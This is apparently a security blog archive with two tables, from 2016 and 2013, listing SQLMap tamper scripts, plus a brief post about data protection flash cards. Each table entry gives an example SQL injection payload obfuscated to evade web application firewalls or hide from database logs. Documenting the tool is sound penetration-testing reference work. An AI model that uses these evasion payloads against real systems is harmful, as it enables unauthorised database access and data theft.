4.7.16

SQLMap Tamper Scripts Update


So my last post from three years ago was pretty well received, with the rate at which SQLMap is developed it is definitely behind.

Here's an updated graph of all tamper scripts included with the latest version (as of time of writing, 04/July/2016).

I will be putting something together, possibly as a commit to the SQLMap project to aid with these. Will update once done so stay tuned.



Name Description Example
apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart '1 AND %271%27=%271'
appendnullbyte.py Appends encoded NULL byte character at the end of payload '1 AND 1=1'
base64encode.py Base64 all characters in a given payload 'MScgQU5EIFNMRUVQKDUpIw=='
between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' '1 AND A NOT BETWEEN 0 AND B--'
bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator 'SELECT%09id FROM users where id LIKE 1'
chardoubleencode.py Double url-encodes all characters in a given payload (not processing already encoded) '%2553%2545%254C%2545%2543%2554%2520%2
546%2549%2545%254C%2544%2520%2546%2552
%254F%254D%2520%2554%2541%2542%254C%2545'
commalesslimit.py Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' ''LIMIT 3 OFFSET 2''
commalessmid.py Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' 'MID(VERSION() FROM 1 FOR 1)'
concat2concatws.py Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' 'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
charencode.py Url-encodes all characters in a given payload (not processing already encoded) '%53%45%4C%45%43%54%20%46%49%45%4C%4
4%20%46%52%4F%4D%20%54%41%42%4C%45'
charunicodeencode.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) '%u0053%u0045%u004C%u0045%u0043%u0054%u
0020%u0046%u0049%u0045%u004C%u0044%u002
0%u0046%u0052%u004F%u004D%u0020%u0054%
u0041%u0042%u004C%u0045'
equaltolike.py Replaces all occurances of operator equal ('=') with operator 'LIKE' 'SELECT * FROM users WHERE id LIKE 1'
escapequotes.py Slash escape quotes (' and ") '1\\\\" AND SLEEP(5)#'
greatest.py Replaces greater than operator ('>') with 'GREATEST' counterpart '1 AND GREATEST(A,B+1)=A'
halfversionedmorekeywords.py Adds versioned MySQL comment before each keyword "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT
(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(
/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR
(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0N
ULL#/*!0AND 'QDWa'='QDWa"
ifnull2ifisnull.py Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' 'IF(ISNULL(1),2,1)'
modsecurityversioned.py Embraces complete query with versioned comment '1 /*!30874AND 2>1*/--'
modsecurityzeroversioned.py Embraces complete query with zero-versioned comment '1 /*!00000AND 2>1*/--'
multiplespaces.py Adds multiple spaces around SQL keywords '1 UNION SELECT foobar'
nonrecursivereplacement.py Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters '1 UNIOUNIONN SELESELECTCT 2--'
percentage.py Adds a percentage sign ('%') infront of each character '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M 
%T%A%B%L%E'
overlongutf8.py Converts all characters in a given payload (not processing already encoded) 'SELECT%C0%AAFIELD%C0%AAFROM%C0%AAT
ABLE%C0%AAWHERE%C0%AA2%C0%BE1'
randomcase.py Replaces each keyword character with random case value 'INseRt'
randomcomments.py Add random comments to SQL keywords 'I/**/N/**/SERT'
securesphere.py Appends special crafted string "1 AND 1=1 and '0having'='0having'"
sp_password.py Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs '1 AND 9227=9227-- sp_password'
space2comment.py Replaces space character (' ') with comments '/**/' 'SELECT/**/id/**/FROM/**/users'
space2dash.py Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
space2hash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227
=9227'
space2morehash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23
lujYFWfv%0A9227=9227'
space2mssqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%0Eid%0DFROM%07users'
space2mssqlhash.py Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') '1%23%0AAND%23%0A9227=9227'
space2mysqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%A0id%0BFROM%0Cusers'
space2mysqldash.py Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') '1--%0AAND--%0A9227=9227'
space2plus.py Replaces space character (' ') with plus ('+') 'SELECT+id+FROM+users'
space2randomblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%0Did%0DFROM%0Ausers'
symboliclogical.py Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) "1 %26%26 '1'='1"
unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT '-1 UNION SELECT'
unmagicquotes.py Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) '1%bf%27 AND 1=1-- '
uppercase.py Replaces each keyword character with upper case value 'INSERT'
varnish.py Append a HTTP header 'X-originating-IP' http://h30499.www3.hp.com/t5/Fortify-Application-S
ecurity/Bypassing-web-application-firewalls-using-HT
TP-headers/ba-p/6418366
versionedkeywords.py Encloses each non-function keyword with versioned MySQL comment '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL
*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST
(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CH
AR(58,100,114,117,58))#
versionedmorekeywords.py Encloses each keyword with versioned MySQL comment '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL
*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFN
ULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*
/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
xforwardedfor.py Append a fake HTTP header 'X-Forwarded-For' ' headers["X-Forwarded-For"]'

7.5.15

Data Protection Flash Cards

Over at Designing for Privacy they've come up with a fantastic new way of raising data protection issues in the design process.

They've come up with a set of flash cards which are split into four categories (constraints / regulation / system / users) which can be used to conceptualize the legal, moral and ethical responsibilities of parties during the design process.

To take a look head on over to www.designingforprivacy.co.uk where you can also find the downloadable versions to print.

15.5.13

SQLMap's Tamper Scripts

THIS POST IS OUTDATED, PLEASE SEE LATEST VERSION HERE

I've been playing with SQLMap a lot recently to automate all sorts of injections, something which isn't so well documented is the tamper scripts which come with it.

Here's a graph with short explanations of what each does, maybe someone will find it useful.


Name Description Example
apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart '1 AND %271%27=%271'
appendnullbyte.py Appends encoded NULL byte character at the end of payload '1 AND 1=1'
base64encode.py Base64 all characters in a given payload 'MScgQU5EIFNMRUVQKDUpIw=='
between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' '1 AND A NOT BETWEEN 0 AND B--'
bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator 'SELECT%09id FROM users where id LIKE 1'
chardoubleencode.py Double url-encodes all characters in a given payload (not processing already encoded) '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
charencode.py Url-encodes all characters in a given payload (not processing already encoded) '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
charunicodeencode.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
equaltolike.py Replaces all occurances of operator equal ('=') with operator 'LIKE' 'SELECT * FROM users WHERE id LIKE 1'
greatest.py Replaces greater than operator ('>') with 'GREATEST' counterpart '1 AND GREATEST(A,B+1)=A'
halfversionedmorekeywords.py Adds versioned MySQL comment before each keyword "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
ifnull2ifisnull.py Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' 'IF(ISNULL(1),2,1)'
modsecurityversioned.py Embraces complete query with versioned comment '1 /*!30874AND 2>1*/--'
modsecurityzeroversioned.py Embraces complete query with zero-versioned comment '1 /*!00000AND 2>1*/--'
multiplespaces.py Adds multiple spaces around SQL keywords '1 UNION SELECT foobar'
nonrecursivereplacement.py Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters '1 UNIOUNIONN SELESELECTCT 2--'
percentage.py Adds a percentage sign ('%') infront of each character '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
randomcase.py Replaces each keyword character with random case value 'INseRt'
randomcomments.py Add random comments to SQL keywords 'I/**/N/**/SERT'
securesphere.py Appends special crafted string "1 AND 1=1 and '0having'='0having'"
sp_password.py Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs '1 AND 9227=9227-- sp_password'
space2comment.py Replaces space character (' ') with comments '/**/' 'SELECT/**/id/**/FROM/**/users'
space2dash.py Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
space2hash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
space2morehash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
space2mssqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%0Eid%0DFROM%07users'
space2mssqlhash.py Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') '1%23%0AAND%23%0A9227=9227'
space2mysqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%A0id%0BFROM%0Cusers'
space2mysqldash.py Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') '1--%0AAND--%0A9227=9227'
space2plus.py Replaces space character (' ') with plus ('+') 'SELECT+id+FROM+users'
space2randomblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%0Did%0DFROM%0Ausers'
unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT '-1 UNION SELECT'
unmagicquotes.py Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) '1%bf%27 AND 1=1-- '
versionedkeywords.py Encloses each non-function keyword with versioned MySQL comment '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
versionedmorekeywords.py Encloses each keyword with versioned MySQL comment '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'